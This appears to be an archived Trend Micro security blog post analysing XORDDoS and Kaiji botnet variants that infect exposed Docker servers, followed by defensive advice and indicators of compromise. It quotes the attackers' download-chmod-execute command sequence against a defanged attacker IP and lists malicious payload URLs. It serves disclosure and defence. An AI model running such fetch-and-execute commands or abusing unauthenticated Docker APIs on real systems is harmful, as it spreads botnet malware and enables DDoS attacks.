XORDDoS, Kaiji Variants Target Exposed Docker Servers
Published: 2020-06-22 · Archived: 2026-04-05 14:59:24 UTC
We have recently detected variants of two existing Linux botnet malware types targeting exposed Docker servers;
these are XORDDoS malware (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) and Kaiji DDoS
malware (detected by Trend Micro as DDoS.Linux.KAIJI.A).
Having Docker servers as their target is a new development for both XORDDoS and Kaiji; XORDDoS was known
for targeting Linux hosts on cloud systems, while recently discovered Kaiji was first reportedopen on a new tab to
affect internet of things (IoT) devices. Attackers usually used botnets to perform brute-force attacks after scanning
for open Secure Shell (SSH) and Telnet ports. Now, they also searched for Docker servers with exposed ports
(2375). Port 2375, one of the two ports Docker API uses, is for unencrypted and unauthenticated
communicationopen on a new tab.
There is, however, a notable difference between the two malware variants’ method of attack. While the XORDDoS
attack infiltrated the Docker server to infect all the containers hosted on it, the Kaiji attack deploys its own container
that will house its DDoS malware.
These malware variants facilitate distributed denial of service (DDoS), a type of attack designed to disable, disrupt,
or shut down a network, website, or service. This is done by using multiple systems to overwhelm the target system
with traffic until it becomes inaccessible to other users.
Analysis of XORDDoS malware
The XORDDoS infection started with the attackers searching for hosts with exposed Docker API ports (2375). They
then sent a command that listed the containers hosted on the Docker server. Afterwards, the attackers executed the
following sequence of commands to all containers, infecting all of them with the XORDDoS malware:
wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP
chmod 777 VIP
./VIP
The XORDDoS payload (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) still used the XOR-key it
used in other recorded attacks, BB2FA36AAA9541F0, to encrypt its strings and to communicate with the command
and control (C&C) server. It also created multiple copies of itself inside the machine as a persistence mechanism.
intel
Figure 1. Code snippet showing XORDDoS creating multiple copies of itself
The payload initiated SYN, ACK, and DNS types of DDoS attacks.
intel
https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/
Page 1 of 4

Figure 2. Code snippet showing the types of DDoS attack that XORDDoS can launch
It is also capable of downloading and executing a follow-up malware, or updating itself.
intel
Figure 3. Code snippet showing XORDDoS’ capability to download and update files.
It gathered the following data, which are relevant to its attempt to initiate a DDoS attack:
CPU Information
MD5 of Running Process
Memory Information
Network Speed
PID of Running Process
It should be noted that most of the behaviors exhibited by this particular XORDDoS variant have already been
observed in earlier variants of the malware.
Upon further investigation of the URL linked to the attacker, we found other malware such as
Backdoor.Linux.DOFLOO.AB, a variant of Dofloo/AESDDoS Linux botnet malware that we witnessed  targeting
exposed Docker APIs previously.
Analysis of Kaiji malware
Similar with the XORDDoS malware, Kaiji is now also targeting exposed Docker servers for propagation. Its
operator also scanned the internet for hosts with exposed port 2375. After finding a target, they pinged the Docker
server before deploying a rogue ARM container that executed the Kaiji binary.
The script 123.sh (detected by Trend Micro as Trojan.SH.KAIJI.A) downloaded and executed the malware payload,
linux_arm (detected by Trend Micro as DDoS.Linux.KAIJI.A). Afterwards, the script also removed other Linux
binaries that are basic components of the operating system but are not necessary for its DDoS operation.
intel
Figure 4. Query that downloads and executes 123.sh
intel
Figure 5. Code snippet showing the removal of Linux binaries
The payload linux_arm, which is the Kaiji DDoS malware, initiated the following DDoS attacks:
ACK attack
IPS spoof attack
SSH attack
SYN attack
SYNACK attack
TCP flood attack
https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/
Page 2 of 4

UDP flood attack
This malware also gathered the following data, which it can use for the aforementioned attacks:
CPU Information
Directories
Domain Name
Host IP address
PID of Running Process
URL scheme
Defending Docker servers
As seen in these findings, threat actors behind malware variants constantly upgrade their creations with new
capabilities so that they can deploy their attacks against other entry points. As they are relatively convenient to
deploy in the cloud, Docker servers are becoming an increasingly popular option for companies. However, these also
make them an attractive target for cybercriminals who are on the constant lookout for systems that they can exploit.
These are some recommendations for securing Docker serversnews article:
Secure the container host. Take advantage of monitoring tools, and host containers in a container-focused OS.
Secure the networking environment. Use intrusion prevention system (IPS) and web filtering to provide
visibility and observe internal and external traffic.
Secure the management stack. Monitor and secure the container registry and lock down the Kubernetes
installation.
Secure the build pipeline. Implement a thorough and consistent access control scheme and install strong
endpoint controls.
Adhere to the recommended best practicesopen on a new tab.
Use security tools to scan and secure containers.
Security solutions are recommended for safeguarding Docker servers. Trend Micro™ Hybrid Cloud
Securityproducts is recommended for automated security and protection for physical, virtual, and cloud workloads.
This solution encompasses the following:
Trend Micro Cloud One™products– for comprehensive visibility and protection against threats
Trend Micro Cloud One - Container Securityproducts– for automated container image and registry scanning
that helps detect threats early on
Trend Micro Cloud One – Workload Securityproducts – for protecting new and existing workloads against
even unknown threats using techniques such as machine learning and virtual patching
For security as software: Trend Micro Deep Security™ Softwareproducts (workload and container security)
and Trend Micro Deep Security Smart Check (container image security)products for scanning container
images and preventing further compromise
Indicators of Compromise
Kaiji
https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/
Page 3 of 4

File
name
SHA 256
Trend Micro pattern
detection
123.sh 9301d983e9d8fad3cc205ad67746cd111024daeb4f597a77934c7cfc1328c3d8 Trojan.SH.KAIJI.A
linux_arm d315b83e772dfddbd2783f016c38f021225745eb43c06bbdfd92364f68fa4c56 DDoS.Linux.KAIJI.A
Related URLs:
hxxp://62[.]171[.]160[.]189/linux_arm
hxxp://62[.]171[.]160[.]189/11/123.sh
XORDDoS and other malware variants found through the same URL
Related URL:
hxxp://122[.]51[.]133[.]49:10086/VIP
Source: https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/
https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/
Page 4 of 4